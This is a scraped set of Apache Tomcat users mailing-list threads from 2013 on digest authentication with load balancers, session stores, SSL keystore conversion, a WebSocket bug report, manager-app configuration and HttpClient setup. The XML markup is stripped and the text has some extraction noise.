  mwSHFhiKpZv60MnswiN9DO2vvCkNBhSE7XSaj/aBsw6aOkxV8w4zE+FbogoFDZZU
  yDqY/kY4LH5tAfddx+9w7shtLsYlgpC8NjF5KMURuJuhw8TOvd3+vzzRq2gEB2Zs
  iseOnfGAvwd1EVZacaMgmaCbqCFcsUvAFx2j4/f5CX1CcPOQT4hE7Tu+UCTbIzGA
  JY3NduFCWR1k9qG07wGtyAP2osz6C9seDYI059Vu5YsOT7V8NpsTROKi+34kMjs4
  wI1J3TqYaJ/2WHMKGvH1r8+2LUg7R5PPBuUrQ4eanU5t1fKmzr7f8VDrOtW1PLW/
  TYg/R9LfX88+u5/L6LqUomC7+mJ1dkihDmel6yM4bgEna6vV2kbw4ro/CCQWvJOj
  MlrsH8tRc7Ven339Wj0S
  =Ps8Q
  -END PGP SIGNATURE-
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: multiple servers and digest authentication

[Martin Gainty]

  


 From: cdeha...@ebay.com
 To: users@tomcat.apache.org
 CC: cdeha...@ebay.com
 Subject: Re: multiple servers and digest authentication
 Date: Sat, 30 Nov 2013 01:55:32 +
 
 Hi,
 
 Thanks for your answers:
 
 1/ Sticky session : yes, that is the way I have currently set my load
 balancer. 
 But there is a drawback when the client is contineoulsy using the service
 = because it will never been load balanced again.
 The worst is when one of the server is stopped and restarted = all the
 clients will be redistributed to the still alive servers,
 And when the server is restarted, it will not picked up any load
 
 To work-around this problem, with sticky session on , I have patched my
 client to clear the sticky cookie every X minutes. That enforces the load
 balancer to give me the less used servers (possibly the one that have been
 restarted)
 
 2/ front-end load balancer solution: my configuration is with an F5 load
 balancer (citrix). From what I understand, the question is : can we
 configure the F5 to manage the nonce and then delegate the authentication
 to the servers (tomcat)- . It will require:
 F5 to manage the nonce (will send back the 401 when nonce not valid) but
MG here is the XSD element definition for noonce using wss4j
MGxmlns:xenc=http://www.w3.org/2001/04/xmlenc#;
MG!-- KANonce --
ObjectProvider qualifiedName=xenc:KA-Nonce
BuilderClass 
className=org.opensaml.xml.encryption.impl.KANonceBuilder /
MarshallingClass 
className=org.opensaml.xml.schema.impl.XSBase64BinaryMarshaller /
UnmarshallingClass 
className=org.opensaml.xml.schema.impl.XSBase64BinaryUnmarshaller /
/ObjectProvider

MGso How would F5 build out a noonce such as
EncryptedData
   EncryptionMethod Algorithm=Example:Block/Alg
 KeySize80/KeySize
   /EncryptionMethod
   ds:KeyInfo xmlns:ds=http://www.w3.org/2000/09/xmldsig#;
 AgreementMethod Algorithm=example:Agreement/Algorithm
   KA-NonceZm9v/KA-Nonce
   ds:DigestMethod
   Algorithm=http://www.w3.org/2001/04/xmlenc#sha1/
  OriginatorKeyInfo
 ds:KeyValue/ds:KeyValue
   /OriginatorKeyInfo
   RecipientKeyInfo
 ds:KeyValue/ds:KeyValue
   /RecipientKeyInfo 
 /AgreementMethod
   /ds:KeyInfo
   CipherData.../CipherData
MG? 
 not verify the user credential and pass that to servers
 
 Servers (tomcat) to not check the nonce but check the credential. I have
 read the description of tomcatAuthentication flag from André's link, but
 I'm not sure it does what I expect
 
 Any idea if this is feasible from F5/tomcat point of views?
 Any other suggestions? ;)
 
 Thanks,
 
 Xtof
 
 On 11/27/13 9:04 AM, Christopher Schultz ch...@christopherschultz.net
 wrote:
 
 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA256
 
 André,
 
 On 11/27/13, 5:15 AM, André Warnier wrote:
  Mark Thomas wrote:
  On 27/11/2013 07:34, Dehaudt, Christophe wrote:
  Is there a way to share the nonce between servers so they can
  act as one?
  
  No. You'd need to customise the DigestAuthenticator to do that.
  
  I would like to get your advices , how to make a multiple
  server deployment running with Http digest.
  
  Use sticky load-balancing.
  
  
  Or do the authentication at the front-end load-balancer level, and
  set Tomcat's authentication to accept what the front-end says ?
  (E.g. 
  
 https://tomcat.apache.org/tomcat-8.0-doc/config/ajp.html#Standard_Impleme
 ntations
 
  #tomcatAuthentication)
 
 While it is popular to do so, I don't think anyone really uses httpd
 for industrial-strength load-balancing. Can an F5 do authentication
 (and forward it to Tomcat?). I suspect not in any way that would work
 well with the back-end application.
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Patch information required

[Martin Gainty]

I will contact all the engineers i know who want to work free for Accenture

Auf 'Wiedersehn
__ 
Verzicht und Vertraulichkeitanmerkung


Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.

  


 From: kanishk.se...@accenture.com
 To: users@tomcat.apache.org
 CC: pravin.pa...@accenture.com
 Subject: Patch information required
 Date: Thu, 28 Nov 2013 06:15:27 +
 
 Hi All,
 
 We are using Apache tomcat version 6.0.26 and we need to install below 
 patches on our servers to fix some Vulnerabilities.
 
 http://svn.apache.org/viewvc?view=revisionrevision=958911
 http://svn.apache.org/viewvc?view=revisionrevision=958977
 http://svn.apache.org/viewvc?view=revisionrevision=959428
 http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03298151
 http://www.juniper.net/alerts/viewalert.jsp?txtAlertNumber=PSN-2012-05-584actionBtn=Search
 
 I am not sure how to install these patches can anyone help us here.
 
 Regards
 Kanishk Sethi
 
 
 
 This message is for the designated recipient only and may contain privileged, 
 proprietary, or otherwise confidential information. If you have received it 
 in error, please notify the sender immediately and delete the original. Any 
 other use of the e-mail by you is prohibited. Where allowed by local law, 
 electronic communications with Accenture and its affiliates, including e-mail 
 and instant messaging (including content), may be scanned by our systems for 
 the purposes of information security and assessment of internal compliance 
 with Accenture policy. .
 __
 
 www.accenture.com
  

Felix plugin for Tomcat?

[Martin Gainty]

All-

 

Is/are there any efforts to integrate Apache Felix OSGI Console Functions (as a 
TC plugin) into either Tomcat 7.x or Tomcat 8x?

http://felix.apache.org/


Thanks,
Martin 


 
  

RE: PersistentManager + JdbcStore

[Martin Gainty]

..Quizas..

 

http://kickjava.com/src/com/lutris/appserver/server/sessionContainerAdapter/JmxContainerAdapterSessionManager.java.htm


(Installar como agente JMX)

Saludos Cordiales
Martin 
__ 
Porfavor..no altere ni interrumpir esta communication...Gracias

  



 Date: Sat, 9 Nov 2013 16:07:42 -0300
 Subject: Re: PersistentManager + JdbcStore
 From: jbig1...@gmail.com
 To: users@tomcat.apache.org
 
 Thanks for this post, but the problem that I have is uncertain. My
 application is Java Web and creates a session for the user in Tomcat
 (version apache-tomcat-7.0.29) and an unusual one user captures the user
 session without finding an explanation.
 
 Could you help me or tell me who to contact to find out how Tomcat creates
 and validates sessions created and if possible capture the session of
 another user from different computers.
 
 Best Regards
 
 
 2013/11/9 spr...@gmx.eu
 
 I think I will fix the DynamoDB-Sessionmanager.
   
Also an option.
  
   Already in process it seems ;)
  
   https://github.com/aws/aws-dynamodb-session-tomcat/issues/3
  
   I hope they will use the code from tomcat for managing the classloader
   issues.
 
  Well, just realized that this Manager is based on PersistentManagerBase.
  So I see no improvement in terms of reliability, because it still writes
  the
  data async into DynamoDB.
  I even cannot see the reason why they created DynamoDBSessionManager,
  DynamoDBSessionStore would have done the job too then.
 
  Looking into the Manager interface (public void backgroundProcess()) tells
  me, that it seems to be always async?
 
  So what is the right stategy to distribute sessions across an arbitrary
  amount of servers with a 100% guarantee that the session will be found at
  any time on any server?
 
  Thank you
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  

RE: Bin Folders

[Martin Gainty]

to hammer home what Jordan is saying:

sh/cmd/bat files are usually based on environment variables e.g.

CATALINA_BASE to the exact location of the specific TOMCAT Instance you are 
running

CATALINA_HOME to the exact location of the folder where TOMCAT was installed

assuming you have set unique service_name for each service

 

http://grokbase.com/t/tomcat/users/1351gyqtgb/multiple-tomcat-containers-or-instance-on-same-servers

if memory serves there is a 

SC query TomcatServiceName 

which should display details for each TOMCAT service

services.msc at run command provides the same info

If CATALINA_BASE changes you will need to uninstall and reinstall to make sure 
the registry has a clean
configuration for the TC instance

I'll defer to Jordan, Dave and others to guide you thru that process..
  



 Date: Wed, 6 Nov 2013 10:39:13 -0800
 From: jor...@viviotech.net
 To: users@tomcat.apache.org
 Subject: Re: Bin Folders
 
 Have you made changes that you want to keep? In my experience the 
 installer script and exe's are fairly well removed from the other files 
 in the bin folder.
 
 Unless you've made specific changes to files that you want to keep, I 
 don't see the point of what you're doing. If you *have* made changes, 
 why not just copy the files you've changed and leave it at that? Make 
 life easier on yourself. ;)
 
 Warm Regards,
 Jordan Michaels
 
 On 11/06/2013 10:29 AM, Crystal Maramba wrote:
  I will as soon as I combine the bin folders.
 
  The service installer does not include the scripts which is what I need 
  from the first install.
 
  Would you know if there will be any issues with the rest of the folders?
 
  -Original Message-
  From: Jordan Michaels [mailto:jor...@viviotech.net]
  Sent: Wednesday, November 06, 2013 10:25 AM
  To: Tomcat Users List
  Subject: Re: Bin Folders
 
  From my experience, no; there should not be an issue with that. Why not 
  just get rid of the first install if you're not going to use it? Keep your 
  system clean and less confusing.
 
  Warm Regards,
  Jordan Michaels
 
  On 11/06/2013 09:34 AM, Crystal Maramba wrote:
  Tomcat version: 7.0.42
  Operating System: Server 2008 x64 (Standard)
  Question:
  I have two Tomcat File Directories:
  1) Windows service installer location: \Program Files\Apache Software
  Foundation\Tomcat 7.0
  2) Base distribution location: \Program Files\Apache\Tomcat 7.0 (this
  did not include the windows service wrapper)
 
  Item 1) was installed after the 2) base distribution location was already 
  configured but we needed to use the 1) windows service installer.
 
  Can I combine the files (.bat scripts) from the bin folders so that all 
  the files with the bin folder in location 2) is in location 1)? Will there 
  be an issue to do this?
 
 
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  -
  To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: Fix your web application so it can cleanly un-deploy and re-deploy - how?

[Martin Gainty]

Springs over-use of CGLib for Interfaces is a memory consumer
Retask CGLib Proxy to JDKProxy to create your Impl classes for @Before advised 
methods

proxyTargetClass: false

Similarly using JavaAssist with Hibernate reduced memory footprint over CGLib 
significantly

 

http://docs.spring.io/spring/docs/3.0.0.M4/reference/html/ch08s05.html

http://what-when-how.com/Tutorial/SpringFramework3/SpringFramework300224.html

 

Dale: How did Mattias Jiderhamn's library help?


Martin  


  



 Subject: Fix your web application so it can cleanly un-deploy and re-deploy - 
 how?
 Date: Thu, 7 Nov 2013 11:50:03 +1300
 From: dale_ogil...@trimble.com
 To: users@tomcat.apache.org
 
 Chris made the following good suggestion in another thread:
 
 Can I make a suggestion? Fix your web application so it can cleanly 
 un-deploy and re-deploy and then simply do a hot deployment?
 
 I've been down this track with our own Spring web apps and found it to be 
 quite a deep rabbit hole where a number of 3rd party libs are used. We get 
 the issue where the webapp classloader is not GC'ed due to classes in the 
 libraries we use not being terminated cleanly. Which means we get a big 
 permgen memory leak when we redeploy the app. The occasional tomcat restart 
 workaround is effective, if nasty.
 
 I did what Chris suggested for one of our apps and I think I got to 3rd party 
 library problem number FIVE (an oracle jdbc driver connection timer) before I 
 gave up in disgust. As I recall undisposed thread locals were a common theme. 
 I used various strategies to resolve the prior issues in things as simple as 
 logging frameworks, JMS queuing libraries, underlying http client code etc. 
 Strategies such as:
 
 1. Specifically calling a low level library finalization routine in a context 
 listener or Spring lifecycle bean
 2. Updating the 3rd party library to a later version which fixed the leak
 3. Including Mattias Jiderhamn's active leak prevention library
 
 I would so love it if Tomcat could just throw away the entire webapp memory 
 footprint on undeploy... Tomcat 7x memory leak protection wasn't good enough 
 for our app a few months ago.
 
 Or failing that, if anyone can share successful strategies for Fixing your 
 web application so it can cleanly un-deploy and re-deploy please do.
 
 Dale
 
 Ref: http://wiki.apache.org/tomcat/MemoryLeakProtection
 Ref: https://github.com/mjiderhamn/classloader-leak-prevention
 
 -Original Message-
 From: Christopher Schultz [mailto:ch...@christopherschultz.net] 
 Sent: Thursday, 7 November 2013 10:44 a.m.
 To: Tomcat Users List
 Subject: Re: how to bounce tomcat remote?
 
 snip
 Can I make a suggestion? Fix your web application so it can cleanly un-deploy 
 and re-deploy and then simply do a hot deployment?
 snip
 
 B�CB��[��X��ܚX�KK[XZ[�\�\��][��X��ܚX�P�X�]
  �\X�K�ܙ�B��܈Y][ۘ[��[X[��K[XZ[�\�\��Z[�X�] �\X�K�ܙ�B�
  

RE: Secure Tomcat With SSL

[Martin Gainty]

For over a year I've been looking for a tool to show the RFC 822 name and the 
PEM

 

Thanks craig!
Martin 

  



 Date: Mon, 28 Oct 2013 16:43:53 -0400
 Subject: Re: Secure Tomcat With SSL
 From: craig.tay...@drivedominion.com
 To: users@tomcat.apache.org
 
 This tool has saved me a few times over:
 http://sourceforge.net/projects/portecle/
 
 
 On Mon, Oct 28, 2013 at 4:41 PM, Ognjen Blagojevic 
 ognjen.d.blagoje...@gmail.com wrote:
 
  Chris,
  Leo,
 
  On 28.10.2013 18:23, Leo Donahue - OETX wrote:
 
  I've been having some trouble lately converting keys and certs from
  OpenSSL
  format into Java's JKS format. I follow all of the magical incantations
  I can find
  online to convert key+cert into a Java keystore but I get no love. Is
  there a
  decent guide anywhere for how to do this?
 
 
  From my book of spells.
 
  Used this to configure SSL in Apache httpd for subversion edge.
 
  openssl pkcs12 -export -in C:/server.crt -inkey C:/server.key -name
  svnedge -out C:/server.p12
 
  keytool -importkeystore -srckeystore C:/server.p12 -srcstoretype PKCS12
  -destkeystore C:/svnedge.jks
 
 
  During TLS handshake, server may respond with complete certificate chain
  (server certificate with all intermediate certificates) or with incomplete
  certificate chain (e.g. server certificate, without any/some intermediate
  certificates). Most servers, around 88% of them, deliver full certificate
  chain, according to research mentioned here [1].
 
  Complete certificate chain is being recognized as valid by every client
  that implements TLS (assuming that root CA certificate is in the client
  keystore). Incomplete certificate chain may be recognized as valid by some
  TLS clients (e.g. Internet Explorer), using information from X.509v3
  extension called Authority Information Access (AIA), or using previously
  validated certificate chains. Some clients will not recognize incomplete
  certificate chain as valid (e.g. openssl or Apache HTTPCommons Client).
  Even the same client may sometimes recognize incomplete certificate chains
  as valid and sometimes as invalid, thanks to caching of intermediate
  certificates. Therefore, it is best practice always to deliver complete
  certificate chain to the client.
 
  Having root CA certificate in the chain is unnecessary, as it wastes your
  bandwidth during TLS handshake (your client already have root CA
  certificate in its own keystore).
 
  Assuming that intermediate certificates (intermediates.pem), server
  certificate (server.pem) and private key (server.key) are all in PEM
  format, you need to add option -certfile to command Leo provided:
 
  openssl pkcs12 -export -out keystore.p12 -name myserver -in server.pem
  -inkey server.key -certfile intermediates.pem
 
 
  Verify that the contents of the p12 keystore with:
 
  openssl pkcs12 -in keystore.p12 -nokeys
 
  You should verify that the certificate chain is complete (up to, but
  without root CA certificate).
 
  Now, you may use that keystore for BIO and NIO connectors:
 
  keystoreFile=keystore.p12 keyAlias=myserver keystoreType=pkcs12
 
  Or you may convert it to JKS keystore as Leo suggests.
 
  -Ognjen
 
  [1] 
  https://bugzilla.mozilla.org/**show_bug.cgi?id=399324#c72https://bugzilla.mozilla.org/show_bug.cgi?id=399324#c72
 
  --**--**-
  To unsubscribe, e-mail: 
  users-unsubscribe@tomcat.**apache.orgusers-unsubscr...@tomcat.apache.org
  For additional commands, e-mail: users-h...@tomcat.apache.org
 
 
  

RE: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage

[Martin Gainty]

Morning Bob-

 

session should never be null..this is a bug

 

create an account here

https://issues.apache.org/bugzilla/createaccount.cgi


and file the bug report

 

Many thanks for discovering this bug and helping us to improve the product


Martin 
__ 

  





From: bob.dere...@thingworx.com
To: users@tomcat.apache.org
Subject: possible tomcat 7.0.47 jsr-356 bug: NULL pointer being thrown when 
DecodeException is caught in PojoMessageHandlerWholeBaseT.onMessage
Date: Sat, 19 Oct 2013 12:46:05 +







I am testing what happens when Encode/Decode Exceptions occur during JSR-356 
communication and found that in the following code in onMessage, the 
((WsSession)session) is NULL.  As a result, the actual DecodeException (cause) 
is lost.
 
   // Can this message be decoded?
Object payload;
try {
payload = decode(message);
} catch (DecodeException de) {
((WsSession) session).getLocal().onError(session, de);
return;
}
 
 
Tracing this further up the stack, I found that Util.getMessageHandlers is 
initializing it and passing NULL in for the session:
 
if (decoderMatch.getTextDecoders().size()  0) {
MessageHandlerResult result = new MessageHandlerResult(
new PojoMessageHandlerWholeText(listener, m, null,
endpointConfig,
decoderMatch.getTextDecoders(), new Object[1],
0, false, -1, -1),
MessageHandlerResultType.TEXT);
results.add(result);
}
 
Is this a bug, or do I need to do something else to get this internal session 
initialize - in addition to calling: addMessageHandler(this) in the onOpen of 
my Endpoint-derived class?
 
Thanks,
 
 
Bob DeRemer
Senior Director, Architecture and Development
 

http://www.thingworx.com
Skype: bob.deremer.thingworx
O: 610.594.6200 x812
M: 717.881.3986
  

RE: can't connect to manager application

[Martin Gainty]

  


 Date: Sat, 19 Oct 2013 10:23:11 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: Re: can't connect to manager application
 
 Il 19/10/13 00:24, Mark Eggers ha scritto:
  On 10/18/2013 3:18 PM, André Warnier wrote:
  Edoardo Panfili wrote:
  Il 17/10/13 18:45, Edoardo Panfili ha scritto:
  My Tomcat (7.0.42) is listening on port 7080 and I have this
  conf/tomcat-users.xml in (production server)
 
  ---
  tomcat-users
  role rolename=manager-script/
  user username=myname password=pwd
  roles=manager-script,manager-gui,manager-jmx/
  /tomcat-users
  --
  if I use
 
  curl -u myname:pwd
  http://localhost:7080/manager/text/reload?path=/myApplication
 
  the response is--
  h1404 Not found/h1
  p
  The page you tried to access
  (/manager/text/reload)
  does not exist.
  /p
  p
  The Manager application has been re-structured for Tomcat 7
  onwards
  and some
  of URLs have changed. All URLs used to access the Manager
  application should
  now start with one of the following options:
  /p
  ul
  li/manager/html for the HTML GUI/li
  li/manager/text for the text interface/li
  li/manager/jmxproxy for the JMX proxy/li
  li/manager/status for the status pages/li
  /ul
  p
  Note that the URL for the text interface has changed from
  quot;/managerquot; to
  quot;/manager/textquot;.
  /p
  p
  You probably need to adjust the URL you are using to access the
  Manager
  application. However, there is always a chance you have found a
  bug
  in the
  Manager application. If you are sure you have found a bug, and
  that
  the bug
  has not already been reported, please report it to the Apache
  Tomcat team.
  /p
  -
 
 
  Installation step by step:
 
  Unpack new download from tomcat.apache.org
 
  1- set users
  tomcat-users
  user username=edoardo password=pwd
  roles=manager-script,manager-gui,manager-jmx,other/
  /tomcat-users
 
  then reload tomcat
  $curl -u edoardo:pwd
  http://localhost:8080/manager/text/reload?path=/examples
  OK - Reloaded application at context path /examples
 
 
  2- copy myApplication from production server
  copy configuration file ($tomcat/Catalina/localhost/myApplication.xml)
  from production server
  stop  start tomcat
 
  $curl -u edoardo:pwd
  http://localhost:8080/manager/text/reload?path=/myApplication
  OK - Reloaded application at context path /myApplication
 
 
  3- first modify to server.xml
  shutdown tomcat
  modify server.xml
  Connector port=8080 protocol=HTTP/1.1
  becomes
  Connector port=9080 protocol=HTTP/1.1
 
  start then curl again
  all well
 
 
  4- second modify to server.xml
  Host name=localhost appBase=webapps
  unpackWARs=true autoDeploy=true
  becomes
  Host name=localhost appBase=webapps
  unpackWARs=true autoDeploy=true deployXML=false
 
  stop-start
 
  $curl -u edoardo:pwd
  http://localhost:9080/manager/text/reload?path=/myApplication
  javax.servlet.ServletException: Error instantiating servlet class
  org.apache.catalina.manager.ManagerServlet
  [...]
 
  $curl -u edoardo:pwd
  http://localhost:9080/manager/text/reload?path=/myApplication
  the same error reported in the initial post (above)
 
 
 
  deployXML=false is recommended at
  http://tomcat.apache.org/tomcat-7.0-doc/config/host.html and useful
  for me.
 
  One big difference that I see when deployXML=false, is that this file :
  (catalina_base)/webapps/myApplication/META-INF/context.xml
  is no longer being parsed,
  and instead this file is parsed :
  $tomcat/Catalina/localhost/myApplication.xml
  when you reload your app.
  What is the content of that file ?
 
  From the last log file that was posted, these context files are pretty
  broken (although myApplication.xml only had the magic debug attribute set).
 
 
 - unpack tomcat
 - add an user in tomcat-users.xml
 - modify server.xml adding deployXML=false to Host
 Host name=localhost appBase=webapps
 unpackWARs=true autoDeploy=true deployXML=false
 - use manager application via curl
 $ curl -u user:pwd http://localhost:8080/manager/text/reload?path=/example
 
 error page.
 
 # cat manager.2013-10-19.log
 19-ott-2013 10.16.17 org.apache.catalina.core.ApplicationContext log
 INFO: Marking servlet Manager as unavailable
 19-ott-2013 10.16.17 org.apache.catalina.core.StandardWrapperValve invoke
 GRAVE: Allocate exception for servlet Manager
 java.lang.SecurityException: Restricted (ContainerServlet) class 
 org.apache.catalina.manager.ManagerServlet
 at 
 org.apache.catalina.core.DefaultInstanceManager.checkAccess(DefaultInstanceManager.java:538)
 at 
 org.apache.catalina.core.DefaultInstanceManager.loadClassMaybePrivileged(DefaultInstanceManager.java:511)
 at 
 org.apache.catalina.core.DefaultInstanceManager.newInstance(DefaultInstanceManager.java:137)
 at 
 org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1144)
 at 
 org.apache.catalina.core.StandardWrapper.allocate(StandardWrapper.java:865)
 at 

RE: can't connect to manager application

[Martin Gainty]

  


 Date: Fri, 18 Oct 2013 18:04:19 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: Re: can't connect to manager application
 
 Il 18/10/13 16:40, André Warnier ha scritto:
  Edoardo Panfili wrote:
  Il 18/10/13 08:43, Ognjen Blagojevic ha scritto:
  On 18.10.2013 7:34, Edoardo Panfili wrote:
  To rule out faulty upgrade, could you try to reproduce the problem on
  clean Tomcat 7.0.42 install?
  the problem was surely present with 7.0.39, the 7.0.42 is a fresh
  installation for me.
 
  Could you please clarify: does the problem exists on 7.0.42, 7.0.39 or
  both?
  both
 
  Could you provide steps to reproduce the problem on fresh 7.0.42
  installation?
  - unpack tomcat
  - modify listen port
  - modify tomcat-users.xml
  - copy jmxremote.access and jmxremote.password (setting permissions)
  - build jsvc
  - copy configuration files for applications (in
  $tomcat/conf/Catalina/localhost)
 
  thank you for you question: also jmx remote access is not working (in
  both tomcat 7.0.39 and 7.0.42), maybe the two problems are related?
 
 
  I tried to reproduce with the information you provided so far, but I was
  unable. It works for me.
  Also on my local machine, where jmx is not configured.
 
 
 
  Usually, a good place to look first, are the Tomcat logfiles.
  What do they say ?
 
 searching for java.lang.SecurityException: Restricted 
 (ContainerServlet) class org.apache.catalina.manager.ManagerServlet
 
MGmy HostManagerServlet is defined in webapps/host-manager/WEB-INF/web.xml as:
  servlet
servlet-nameHostManager/servlet-name

servlet-classorg.apache.catalina.manager.host.HostManagerServlet/servlet-class
init-param
  param-namedebug/param-name
  param-value2/param-value
/init-param
  /servlet
  servlet
servlet-nameHTMLHostManager/servlet-name

servlet-classorg.apache.catalina.manager.host.HTMLHostManagerServlet/servlet-class
init-param
  param-namedebug/param-name
  param-value2/param-value
/init-param
  /servlet
/MG 
 
 seem that the solution is to add privileged=true 
MGmy privileged attr in Context is located at 
/webapps/host-manager/META-INF/context.xml as:
Context antiResourceLocking=false privileged=true /
/MG
 
at 
 $tomcat/conf/context.xml... and the reoload command now works.
 
 thank you
 Edoardo
MGmolte grazie Edoardo
MGMartin
 
 
 
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: can't connect to manager application

[Martin Gainty]

source
http://localhost:8080/manager/text/reload?path=/examples
/source

 

Signal an existing application to shut itself down and reload.  This can
be useful when the web application context IS NOT RELOADABLE

and you have updated classes or property files in the 

code/WEB-INF/classes/code
directory or when you have added or updated jar files in the
code/WEB-INF/lib/code directory.


 Context reloadable attribute would need to reflect reloadable=false e.g.


Context path=/petclinic reloadable=false


Buona Fortuna,
Martin 
__ 
Si prega di non alterare o interrompere questa trasmissione...Grazie

  



 Date: Thu, 17 Oct 2013 18:45:30 +0200
 From: edoa...@aspix.it
 To: users@tomcat.apache.org
 Subject: can't connect to manager application
 
 My Tomcat (7.0.42) is listening on port 7080 and I have this 
 conf/tomcat-users.xml in (production server)
 
 ---
 tomcat-users
 role rolename=manager-script/
 user username=myname password=pwd
 roles=manager-script,manager-gui,manager-jmx/
 /tomcat-users
 --
 if I use
 
 curl -u myname:pwd 
 http://localhost:7080/manager/text/reload?path=/myApplication
 
 the response is--
 h1404 Not found/h1
 p
 The page you tried to access
 (/manager/text/reload)
 does not exist.
 /p
 p
 The Manager application has been re-structured for Tomcat 7 onwards 
 and some
 of URLs have changed. All URLs used to access the Manager 
 application should
 now start with one of the following options:
 /p
 ul
 li/manager/html for the HTML GUI/li
 li/manager/text for the text interface/li
 li/manager/jmxproxy for the JMX proxy/li
 li/manager/status for the status pages/li
 /ul
 p
 Note that the URL for the text interface has changed from
 quot;/managerquot; to
 quot;/manager/textquot;.
 /p
 p
 You probably need to adjust the URL you are using to access the Manager
 application. However, there is always a chance you have found a bug 
 in the
 Manager application. If you are sure you have found a bug, and that 
 the bug
 has not already been reported, please report it to the Apache 
 Tomcat team.
 /p
 -
 on my local machine all goes well (same tomcat version but on port 
 8080), can't figure what is different on production server... where can 
 I take a look?
 
 Some release ago (tomcat 7.0.x sorry, I can't be more precise) all was 
 well also on production server. Maybe i did something wrong during an 
 update.
 
 thank you
 Edoardo
 
 -
 To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
 For additional commands, e-mail: users-h...@tomcat.apache.org
 
  

RE: RSocket Error

[Martin Gainty]

MG1)the problem calling executeMethod will need to try{..} catch for 
IOException and HttpException
/**
  308* Executes the given {@link HttpMethod HTTP method}.
  309*
  310* @param method the {@link HttpMethod HTTP method} to execute.
  311* @return the method's response code
  312*
  313* @throws IOException If an I/O (transport) error occurs. Some 
transport exceptions
  314* can be recovered from.  
  315* @throws HttpException  If a protocol exception occurs. Usually 
protocol exceptions 
  316*cannot be recovered from.
  317*/
  318   public int executeMethod(HttpMethod method)
  319   throws IOException, HttpException  {
  320   
  321   LOG.trace(enter HttpClient.executeMethod(HttpMethod));
  322   // execute this method and use its host configuration, if it 
has one
  323   return executeMethod(null, method, null);
  324   }

MG2)If you have a reliable HostConfiguration why not use that?
MG
/**
  352* Executes the given {@link HttpMethod HTTP method} using the 
given custom 
  353* {@link HostConfiguration host configuration} with the given 
custom 
  354* {@link HttpState HTTP state}.
  355*
  356* @param hostconfig The {@link HostConfiguration host 
configuration} to use.
  357* If codenull/code, the host configuration returned by {@link 
#getHostConfiguration} will be used.
  358* @param method the {@link HttpMethod HTTP method} to execute.
  359* @param state the {@link HttpState HTTP state} to use when 
executing the method.
  360* If codenull/code, the state returned by {@link #getState} 
will be used.
  361*
  362* @return the method's response code
  363*
  364* @throws IOException If an I/O (transport) error occurs. Some 
transport exceptions
  365* can be recovered from.
  366* @throws HttpException  If a protocol exception occurs. Usually 
protocol exceptions 
  367*cannot be recovered from.
  368* @since 2.0
  369*/
  370   public int executeMethod(HostConfiguration hostconfig, 
  371   final HttpMethod method, final HttpState state)
  372   throws IOException, HttpException  {The constructors are weak 
for HostConfiguration you will need to build empty HostConfiguration
first set the Hostname, port and protocol
setHost(final String host, int port, final Protocol protocol)then  set the 
ProxyHost and the proxyPort
setProxy(final String proxyHost, int proxyPort) 

http://www.docjar.com/html/api/org/apache/commons/httpclient/HostConfiguration.java.html

finally on multi-homed or clustered configurations set the InetAddress
/**
  449* Set the local address to be used when creating connections.
  450* If this is unset, the default address will be used.
  451* This is useful for specifying the interface to use on 
multi-homed or clustered systems.
  452* 
  453* @param localAddress the local address to use
  454*/
  455   
  456   public synchronized void setLocalAddress(InetAddress localAddress) 
most people use static route to identify a gateway for a particular IP 
configuration 
request the static route from your net-admin
http://www.nongnu.org/quagga/docs/docs-multi/Static-Route-Commands.html

it is also possible on linux to configure specific rules for multi-homed systems
details on which rule to use for multi-homed on linux the command on which ip 
rule you should also be obtained from net-admin  
ip rule 
listhttps://blogs.oracle.com/networking/entry/advance_routing_for_multi_homed

the rule will point you to the IP you should use in InetAddress

Martin 
__ 
Verzicht und Vertraulichkeitanmerkung/Note de déni et de confidentialité
 
Diese Nachricht ist vertraulich. Sollten Sie nicht der vorgesehene Empfaenger 
sein, so bitten wir hoeflich um eine Mitteilung. Jede unbefugte Weiterleitung 
oder Fertigung einer Kopie ist unzulaessig. Diese Nachricht dient lediglich dem 
Austausch von Informationen und entfaltet keine rechtliche Bindungswirkung. 
Aufgrund der leichten Manipulierbarkeit von E-Mails koennen wir keine Haftung 
fuer den Inhalt uebernehmen.
Ce message est confidentiel et peut être privilégié. Si vous n'êtes pas le 
destinataire prévu, nous te demandons avec bonté que pour satisfaire informez 
l'expéditeur. N'importe quelle diffusion non autorisée ou la copie de ceci est 
interdite. Ce message sert à l'information seulement et n'aura pas n'importe 
